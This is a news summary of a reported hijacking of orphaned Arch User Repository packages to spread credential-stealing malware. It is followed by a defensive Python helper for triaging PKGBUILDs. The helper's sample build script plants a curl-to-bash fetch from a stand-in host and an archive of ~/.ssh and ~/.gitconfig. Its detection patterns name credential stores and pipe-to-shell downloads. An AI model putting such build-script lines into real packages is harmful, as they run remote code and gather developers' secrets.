Attackers hijacked over 1,500 Arch Linux packages
2 days ago
- #Malware Campaign
- #Open Source Security
- #Supply Chain Attack
- Attackers hijacked over 1,500 packages in the Arch User Repository (AUR) by adopting orphaned packages and altering build instructions to install credential-stealing malware.
- The malware, dubbed 'Atomic Arch', targeted developers by stealing credentials like browser cookies, GitHub tokens, SSH keys, and more, using Tor to exfiltrate data.
- The attack exploited trust in package maintainers, not technical vulnerabilities, highlighting risks in open-source repositories with minimal vetting.
- Arch Linux temporarily froze new account registrations during cleanup, while its core distribution and official repos remained unaffected.
- Researchers note this tactic reflects a broader trend in 2026 of hijacking abandoned projects rather than creating new malicious ones, increasing supply-chain attack risks.
- The incident underscores the need for users to scrutinize build scripts and be wary of recently adopted packages, as structural issues in trust models persist.
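As an added illustration of the two habits the last bullet recommends (reading the build script yourself, and treating a package that recently changed hands with extra care), here is a small Python triage helper. It is not code from the article, from Arch Linux or from the researchers. The PKGBUILD text and the timestamps are constructed samples; the regex list is a set of generic review heuristics, not signatures for the malware named above; and the `maintainer_since` field is an assumption on the caller's side, since the AUR RPC reports `FirstSubmitted` and `LastModified` but not when the current maintainer adopted the package.

```python
"""Triage helper for AUR build scripts (added example; not from the article,
Arch Linux or the researchers). It surfaces (1) PKGBUILD constructs that
warrant a manual read and (2) packages that changed hands recently. Every
check is a heuristic: a hit means "look at this", not "malicious"."""
import re

# Regexes a reviewer would want pointed out in a build script.
SUSPICIOUS_PATTERNS = {
    # downloading a script and piping it straight into a shell
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    # inline encoded blobs being decoded at build/package time
    "decode_blob": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "eval": re.compile(r"\beval\b"),
    # tooling or addresses associated with Tor (can be legitimate; still read it)
    "tor_or_onion": re.compile(r"\.onion\b|\btorsocks\b|\btor\b", re.IGNORECASE),
    # files that hold developer credentials
    "credential_store": re.compile(
        r"\.ssh\b|\.gitconfig\b|\.config/gh\b|\.mozilla\b|\.config/(chromium|google-chrome)\b"),
    # shell start-up files and scheduler directories
    "persistence": re.compile(r"\.bashrc|\.profile|/etc/cron|systemd/user"),
    # a skipped checksum means a changed source tarball goes unnoticed
    "skipped_checksum": re.compile(r"sums=.*\bSKIP\b"),
}

SAMPLE_PKGBUILD = """\
# Maintainer: example-user <user@example.invalid>   (constructed sample)
pkgname=example-tool
pkgver=1.4.2
pkgrel=2
arch=('x86_64')
url="https://example.invalid/example-tool"
source=("$url/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  # the next two lines are the kind of addition a reviewer should catch
  curl -fsSL https://example.invalid/post-install.sh | bash
  tar czf "$srcdir/.cache.tgz" "$HOME/.ssh" "$HOME/.gitconfig"
}
"""

DAY = 86400
NOW = 1_800_000_000  # constructed "current time", Unix epoch seconds
# Constructed ownership record. first_submitted/last_modified mirror the AUR RPC
# fields; maintainer_since is an ASSUMED field the caller derives elsewhere.
SAMPLE_META = {
    "first_submitted": NOW - 3 * 365 * DAY,
    "maintainer_since": NOW - 10 * DAY,
    "last_modified": NOW - 8 * DAY,
    "now": NOW,
}


def scan_pkgbuild(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, pattern name, stripped line) for every hit.
    Comment lines are skipped; one hit per pattern per line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for name, pat in SUSPICIOUS_PATTERNS.items():
            if pat.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def maintainer_signals(first_submitted: int, maintainer_since: int,
                       last_modified: int, now: int,
                       adoption_window_days: int = 30) -> list[str]:
    """Ownership signals; all arguments are Unix epoch seconds."""
    signals = []
    if now - maintainer_since < adoption_window_days * DAY:
        signals.append("recently_adopted")
        # an old package picked up by a new maintainer is the orphan-adoption shape
        if maintainer_since - first_submitted > 365 * DAY:
            signals.append("old_package_new_maintainer")
        # build instructions edited within a week of taking over
        if 0 <= last_modified - maintainer_since < 7 * DAY:
            signals.append("modified_right_after_adoption")
    return signals


def triage(pkgbuild: str, first_submitted: int, maintainer_since: int,
           last_modified: int, now: int) -> dict:
    """Combine both checks into a verdict for the person about to run makepkg."""
    hits = scan_pkgbuild(pkgbuild)
    signals = maintainer_signals(first_submitted, maintainer_since, last_modified, now)
    if hits and signals:
        verdict = "hold_for_manual_review"
    elif hits or signals:
        verdict = "review_before_install"
    else:
        verdict = "no_heuristic_hits"
    return {"hits": hits, "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_PKGBUILD, **SAMPLE_META)
    for lineno, name, line in result["hits"]:
        print(f"line {lineno:>3} [{name}] {line}")
    print("ownership signals:", result["signals"])
    print("verdict:", result["verdict"])
```

On the constructed sample the scan flags the `SKIP` checksum, the `curl | bash` line and the archive of `~/.ssh` and `~/.gitconfig`, and the ownership check reports a three-year-old package adopted ten days ago and edited two days later, so the verdict is to hold it. `SKIP` is normal for VCS (`-git`) packages and `tor` appears in legitimate package names, which is why the output is a reading list for a human rather than a block decision.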